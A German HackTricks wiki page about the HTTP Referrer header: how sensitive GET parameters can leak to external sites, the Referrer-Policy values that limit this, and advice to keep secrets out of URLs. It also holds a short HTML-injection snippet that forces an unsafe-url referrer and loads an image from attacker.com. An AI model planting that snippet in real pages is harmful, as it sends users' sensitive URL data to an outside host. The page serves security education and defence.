hacktricks/interesting-http.md
2024-02-10 15:36:32 +00:00

3.8 KiB

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Referrer-Header und Richtlinie

Referrer ist der Header, den Browser verwenden, um anzuzeigen, welche vorherige Seite besucht wurde.

Ausgetretene sensible Informationen

Wenn sich an einer Stelle innerhalb einer Webseite sensible Informationen in GET-Anforderungsparametern befinden, wenn die Seite Links zu externen Quellen enthält oder ein Angreifer in der Lage ist, den Benutzer dazu zu bringen/vorzuschlagen (Social Engineering), eine URL zu besuchen, die vom Angreifer kontrolliert wird. Es könnte in der Lage sein, die sensiblen Informationen in der letzten GET-Anforderung zu exfiltrieren.

Minderung

Sie können den Browser dazu bringen, einer Referrer-Richtlinie zu folgen, die verhindern kann, dass sensible Informationen an andere Webanwendungen gesendet werden:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Gegenmaßnahme

Sie können diese Regel mit einem HTML-Meta-Tag außer Kraft setzen (der Angreifer muss eine HTML-Injektion ausnutzen):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Verteidigung

Geben Sie niemals sensible Daten in GET-Parametern oder Pfaden in der URL an.

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: